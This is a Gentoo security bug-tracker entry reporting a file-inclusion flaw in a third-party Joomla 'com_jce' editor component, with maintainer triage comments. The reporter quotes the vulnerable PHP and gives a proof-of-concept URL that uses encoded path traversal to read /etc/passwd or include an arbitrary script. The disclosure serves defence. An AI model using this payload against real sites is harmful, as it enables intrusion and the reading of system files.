| Summary: | www-apps/joomla "com_jce" file inclusion | ||
|---|---|---|---|
| Product: | Gentoo Security | Reporter: | Emanuele Gentili <bathym> |
| Component: | Vulnerabilities | Assignee: | Gentoo Web Application Packages Maintainers <web-apps> |
| Status: | RESOLVED UPSTREAM | ||
| Severity: | critical | CC: | beu, taviso |
| Priority: | Highest | ||
| Version: | unspecified | ||
| Hardware: | All | ||
| OS: | Linux | ||
| Whiteboard: | |||
| Package list: | Runtime testing required: | --- | |
upstram (joomla) mailed. Joomla has never been marked stable on any security supported architecture, so the security team wont handle this bug. It looks like that file is some random third party extension http://extensions.joomla.org/component/option,com_mtree/task,viewlink/link_id,1157/Itemid,35/ There is no jce.php in joomla-1.0.11.tar.bz2, and the string "com_jce" doesnt appear once in the joomla distribution, afaict Reassigning to web-apps... file upstream |
com_jce component in jce.php ... switch ( $task ) { case 'popup': showPopup(); break; case 'plugin': ... look case 'plugin' !!! $plugin = cleanInput( mosGetParam( $_REQUEST, 'plugin' ) ); if( in_array( $plugin, $plugins ) ){ $file = cleanInput( basename( mosGetParam( $_REQUEST, 'file' ) ) ); $path = $mainframe->getCfg('absolute_path') . '/mambots/editors/jce/jscripts/tiny_mce/plugins/' . $plugin; if( is_dir( $path ) && file_exists( $path . '/' . $file ) ){ include_once $path . '/' . $file; We can include evil script. &task=plugin&plugin=..%3C%3E/%3C...%3C///..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////etc&file=passwd&path= POC: http://www.website.dom/modules/mod_ajaxtabs_orthopal/index2.php?option=com_jce&task=plugin&plugin=..%3C%3E/%3C...%3C///..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////..%3C////etc&file=passwd&path=[EVILSCRIPT] all joomla version is vulnerable, i thnk mambo too. just try :P